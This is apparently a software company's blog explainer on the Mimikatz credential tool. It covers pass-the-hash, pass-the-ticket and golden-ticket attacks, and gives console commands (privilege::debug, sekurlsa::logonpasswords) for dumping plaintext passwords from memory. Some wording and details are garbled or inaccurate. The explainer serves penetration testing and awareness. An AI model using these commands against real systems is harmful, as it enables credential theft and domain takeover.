What is Mimikatz?

Mimikatz was originally developed by Benjamin Delpy to demonstrate to Microsoft that their authentication protocols could be hacked by attackers. In doing so, he inadvertently created one of the most used and downloaded hacking tools of the last 20 years.

Experts believe that Mimikatz has done more to improve security than any other known tool. Hackers can infiltrate your networks - stay one step ahead of them.

Mimikatz review

Mimikatz is an open source program that allows users to view and store authentication data such as Kerberos tickets. Future development of Mimikatz will continue to be led by Benjamin Delpy. That's why the toolkit works with all current editions of Windows and contains the latest attacks.

Attackers typically use Mimikatz to steal credentials and gain elevated privileges: in most cases, it is detected and removed by security software on endpoints and antivirus systems. Penetration testers, on the other hand, use Mimikatz to detect and exploit security holes in their networks so that they can be closed.

What can Mimikatz do?

Mimikatz initially demonstrated how a vulnerability in the Windows authentication system could be exploited. This tool currently detects various types of security vulnerabilities. Mimikatz can be used to perform various credential collection methods, such as:

Pass-the-Hash. Windows uses an NTLM hash to store password data. Attackers use Mimikatz to transmit this exact login hash string to the target computer. Attackers don't even need to crack the password; they can simply use the hash string as is. It's like finding the master key to a building on the ground. You only need one key to open all doors.

Pass-the-Ticket. Newer versions of Windows store password information in a construct called a ticket. Mimikatz allows a user to transfer a Kerberos ticket to another computer and log in using that user's ticket. In all other respects, this is equivalent to the pass hash method.

Over-Pass the Hash (Pass-the-Key). Another option for passing a hash, but this method involves passing a unique key to impersonate the user, which you can obtain from the domain controller.

Kerberos Golden Ticket. This is a ticket transfer attack, but uses a special hidden account ticket called KRBTGT, which encrypts all other tickets. The Golden Ticket gives you permanent domain administrator rights on all computers on your network.

Kerberos Silver Ticket. Another method of transferring a ticket. Silver Ticket uses a Windows feature that makes it easier to use online services. Kerberos issues the user a TGS ticket, which allows him to log on to all services on the network. Microsoft does not always verify TGS after it is issued, so it can be easily smuggled through security measures.

Pass-the-Cache. Finally an attack that doesn't take advantage of Windows! A cache pass attack is typically similar to a ticket pass attack, but uses stored and encrypted credentials on a Mac/UNIX/Linux system.

Sources for downloading Mimikatz

You can download Mimikatz from Benjamin Delpy's GitHub - it offers several download options, from the executable file to the source code. It must be compiled using Visual Studio 2010 or later.

How to use Mimikatz?

When you run Mimikatz with the executable program, you are presented with an interactive Mimikatz console from which you can execute commands in real time.

Running Mimikatz as administrator

To get the full functionality of Mimikatz, select "Run as administrator" even if you are using an administrator account.

Checking the Mimikatz version

There are two versions of Mimikatz: 32-bit and 64-bit. Make sure you are using the correct version for your Windows installation. The "Version" command allows Mimikatz to obtain information about the version of the executable, the Windows version, and whether Windows settings are preventing Mimikatz from running correctly.

Retrieving plaintext passwords from memory

The Sekursla Mimikatz module allows you to reset passwords from memory. To use commands in the Sekursla module, you need Administrator or SYSTEM rights.

First run this command:

mimikatz # privilege::debug

From the output you can see if you have the necessary permissions to continue.

Then run the journal functions to review your work later.

mimikatz # log nameoflog.log

Finally, print out all the plaintext passwords stored on this computer.

mimikatz # sekurlsa::logonpasswords

Using other Mimikatz modules

The encryption module allows you to access the Crypto API in Windows, which allows you to list and export certificates and their private keys, even if they are marked as unexportable.

The Kerberos module accesses the Kerberos API, so you can experiment with this functionality by retrieving and manipulating Kerberos tickets.

The Services module allows you to start, stop, disable Windows services, etc.

Mainton Company - custom software development and testing, DevOps and SRE, SEO and online advertising since 2004.